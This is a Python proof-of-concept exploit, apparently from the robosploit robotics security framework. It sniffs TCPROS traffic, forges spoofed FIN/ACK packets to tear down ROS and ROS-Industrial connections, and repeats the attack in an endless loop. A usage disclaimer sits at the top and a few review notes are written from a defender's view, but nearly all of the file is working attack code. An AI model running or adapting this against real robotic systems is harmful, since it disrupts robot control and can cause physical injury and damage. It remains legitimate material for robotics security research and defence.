FIN-ACK attack proof-of-concept for disrupting ROS and ROS-Industrial setups.
""" | |
FIN-ACK attack for ROS | |
DISCLAIMER: Use against your own hosts only! By no means Alias Robotics | |
or the authors of this exploit encourage or promote the unauthorized tampering | |
with running robotic systems. This can cause serious human harm and material | |
damages. | |
""" | |
from scapy.all import * | |
from robosploit.modules.generic.robotics.all import * | |
from robosploit.core.exploit import * | |
from robosploit.core.http.http_client import HTTPClient | |
from scapy.layers.inet import TCP | |
from scapy.layers.l2 import Ether | |
import sys | |
# bind TCP to TCPROS with no field condition, so scapy tries to dissect every
# TCP payload as TCPROS; this is what makes the TCPROSBody layer lookups in
# tcpros_fin_ack() possible. Note the binding is global for the process.
bind_layers(TCP, TCPROS)
def tcpros_fin_ack() -> None:
    """
    Craft a spoofed FIN/ACK that tears down one observed TCPROS connection.

    The function passively sniffs TCP traffic on ``eth0`` until a capture
    contains a packet carrying a ``TCPROSBody`` layer followed by the peer's
    matching acknowledgement. It then forges a FIN/ACK segment whose addresses,
    ports and sequence numbers are copied from that pair and, if the peer
    answers with its own FIN/ACK, completes the close with a final ACK.

    Returns:
        None. Blocks until one packet pair has been found and handled.

    Review notes (defender view): nothing here touches either endpoint; the
    code only needs to observe sequence numbers on the wire (``sniff``) and
    inject raw segments (``sr1``/``send``), which is possible because TCPROS
    is unauthenticated plaintext TCP. The forged packets carry a fixed
    ``ttl=99`` and ``id = observed id + 1``; whether those differ from what
    the impersonated host really emits is something to confirm against a
    capture before using them as a detection signature.
    """
    flag_valid = True       # stays True until a usable packet pair is found
    targetp = None          # packet carrying TCPROSBody; its sender is impersonated
    targetp_ack = None      # the peer's acknowledgement of targetp
    # capture 4 TCP packets per iteration (count=4; the original comment said 10)
    while flag_valid:
        packages = sniff(iface="eth0", filter="tcp", count=4)
        # scapy's PacketList[layer] yields only the packets that contain that layer
        if len(packages[TCPROSBody]) < 1:
            continue
        else:
            # take the most recent TCPROSBody packet as the target
            targetp = packages[TCPROSBody][-1] # pick latest instance
            # position of that packet in the capture; .index() is presumably
            # delegated to the underlying list by PacketList -- verify with the
            # scapy version in use
            index = packages.index(packages[TCPROSBody][-1])
            # scan the packets captured after it for the peer's acknowledgement:
            # addresses and ports mirrored, and its seq equal to targetp's ack
            for i in range(index + 1, len(packages)):
                targetp_ack = packages[i]
                # check if the ack matches appropriately
                if targetp[IP].src == targetp_ack[IP].dst and \
                   targetp[IP].dst == targetp_ack[IP].src and \
                   targetp[TCP].sport == targetp_ack[TCP].dport and \
                   targetp[TCP].dport == targetp_ack[TCP].sport and \
                   targetp[TCP].ack == targetp_ack[TCP].seq:
                    flag_valid = False
                    break
    # the while loop only exits once flag_valid is False, so the first condition
    # below always holds here; the None checks guard the unpacked packets
    if not flag_valid and targetp_ack and targetp:
        # forged FIN/ACK impersonating targetp's sender: addresses and ports copied,
        # seq/ack continued from the peer's acknowledgement; ttl and IP id are fixed guesses
        p_attack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\
            /TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="FA", seq=targetp_ack[TCP].ack,
                 ack=targetp_ack[TCP].seq)
        # send once (retry=0) and wait at most 1 s for a single reply
        ans = sr1(p_attack, retry=0, timeout=1)
        if ans and len(ans) > 0 and ans[TCP].flags == "FA":
            # peer replied with its own FIN/ACK: finish the teardown with a final ACK
            p_ack =IP(src=targetp[IP].src, dst=targetp[IP].dst,id=targetp[IP].id + 1,ttl=99)\
                /TCP(sport=targetp[TCP].sport,dport=targetp[TCP].dport,flags="A", seq=ans[TCP].ack,
                     ack=ans[TCP].seq + 1)
            send(p_ack)
# run the attack repeatedly, one connection per call; there is no exit
# condition, so the process only stops when interrupted externally
while True:
    tcpros_fin_ack()